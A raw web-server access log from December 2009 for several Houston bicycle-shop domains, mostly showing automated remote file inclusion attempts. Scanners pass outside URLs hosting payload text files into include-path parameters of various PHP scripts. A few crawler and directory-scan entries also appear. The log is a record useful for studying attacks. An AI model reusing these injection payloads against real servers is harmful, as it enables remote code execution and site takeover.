78.157.115.4 - - [11/Dec/2009:03:15:19 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:19 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:20 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:24 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:24 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:24 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:28 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:28 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:28 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:38 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:38 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.157.115.4 - - [11/Dec/2009:03:15:38 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.75 - - [11/Dec/2009:03:17:04 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
67.195.115.254 - - [11/Dec/2009:03:17:27 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.115.254 - - [11/Dec/2009:03:17:31 -0800] "GET /logs/access_090610.log HTTP/1.0" 200 3652968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
119.63.193.75 - - [11/Dec/2009:03:19:09 -0800] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
67.19.51.194 - - [11/Dec/2009:03:28:02 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.29.247 - - [11/Dec/2009:03:28:51 -0800] "GET /logs/ HTTP/1.1" 200 2368 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
67.19.51.194 - - [11/Dec/2009:03:29:16 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:03:29:56 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://h1.ripway.com/honda1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:03:29:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/honda1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Dec/2009:03:29:56 -0800] "GET /appserv/main.php?appserv_root=http://h1.ripway.com/honda1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Dec/2009:03:35:56 -0800] "GET /bullitinboard/viewtopic.php?p=3514 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
69.58.178.30 - - [11/Dec/2009:03:59:48 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:49 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:50 -0800] "GET /blog/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:51 -0800] "GET /?N=D HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:52 -0800] "GET /?M=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:53 -0800] "GET /?S=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:54 -0800] "GET /?D=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:55 -0800] "GET /Employeesite/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:58 -0800] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:03:59:59 -0800] "GET /fit.html HTTP/1.1" 200 17443 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:04:00:00 -0800] "GET /aboutus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:04:00:01 -0800] "GET /contactus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:04:00:02 -0800] "GET /services.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:04:00:03 -0800] "GET /logs/ HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:04:00:04 -0800] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
69.58.178.30 - - [11/Dec/2009:04:00:05 -0800] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.bicyclestoreshouston.com"
67.195.111.183 - - [11/Dec/2009:04:39:18 -0800] "GET /logs/?N=D HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
190.128.225.162 - - [11/Dec/2009:05:06:29 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "bicyclestoreshouston.com"
69.16.250.4 - - [11/Dec/2009:05:13:01 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:13:01 -0800] "GET /skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:13:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:13:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:13:11 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:13:11 -0800] "GET /skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:20:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:20:26 -0800] "GET /skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:20:26 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:20:32 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:20:32 -0800] "GET /skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.250.4 - - [11/Dec/2009:05:20:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:24:45 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:24:45 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:24:45 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.29.247 - - [11/Dec/2009:05:27:25 -0800] "GET /tmp/ HTTP/1.1" 200 659 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
77.222.40.169 - - [11/Dec/2009:05:27:35 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:27:35 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:27:35 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [11/Dec/2009:05:30:36 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [11/Dec/2009:05:30:36 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [11/Dec/2009:05:30:36 -0800] "GET /logs/access.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [11/Dec/2009:05:30:37 -0800] "GET /logs/access.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [11/Dec/2009:05:30:37 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [11/Dec/2009:05:30:37 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:05:31:24 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:05:31:24 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:05:31:24 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:05:32:34 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:05:32:34 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:05:32:35 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:35:08 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [11/Dec/2009:05:35:13 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [11/Dec/2009:05:35:14 -0800] "GET /logs/?S=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
62.140.23.192 - - [11/Dec/2009:05:38:40 -0800] "GET /config.inc.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:38:43 -0800] "GET /logs/access.log//config.inc.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:38:43 -0800] "GET /logs//config.inc.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.40.169 - - [11/Dec/2009:05:41:05 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:48:10 -0800] "GET /mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:48:10 -0800] "GET /logs//mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:48:11 -0800] "GET /logs/access.log%20%20//mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:48:26 -0800] "GET /mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:48:26 -0800] "GET /logs/access.log//mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/Dec/2009:05:48:26 -0800] "GET /logs//mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
196.216.47.14 - - [11/Dec/2009:05:48:50 -0800] "GET /logs/index.php?sayfa=http://byasker.by.funpic.de/response.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
196.216.47.14 - - [11/Dec/2009:05:48:52 -0800] "GET /logs/access.log/index.php?sayfa=http://byasker.by.funpic.de/response.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
196.216.47.14 - - [11/Dec/2009:05:48:53 -0800] "GET /index.php?sayfa=http://byasker.by.funpic.de/response.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:05:54:54 -0800] "GET /bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:05:54:54 -0800] "GET /logs/access.log%20%20//bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:05:54:54 -0800] "GET /logs//bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:05:55:32 -0800] "GET /bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:05:55:49 -0800] "GET /logs//bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:05:55:49 -0800] "GET /logs/access.log%20%20//bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:24 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:24 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:24 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:34 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:34 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
125.245.165.135 - - [11/Dec/2009:06:00:34 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.infocleaners.com/images/title/idosyris.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:06:04:55 -0800] "GET /logs/access.log//bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:06:05:53 -0800] "GET /logs/access.log//bbs///skin/buzzard_espoon/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:06:11:07 -0800] "GET /zboard/skin/happycast//setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:06:11:07 -0800] "GET /logs/access.log%20%20//zboard/skin/happycast//setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:06:11:08 -0800] "GET /logs//zboard/skin/happycast//setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:06:13:31 -0800] "GET /logs/access.log%20%20//zboard/skin/happycast//setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:06:13:32 -0800] "GET /logs//zboard/skin/happycast//setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:06:13:32 -0800] "GET /zboard/skin/happycast//setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Dec/2009:06:14:28 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
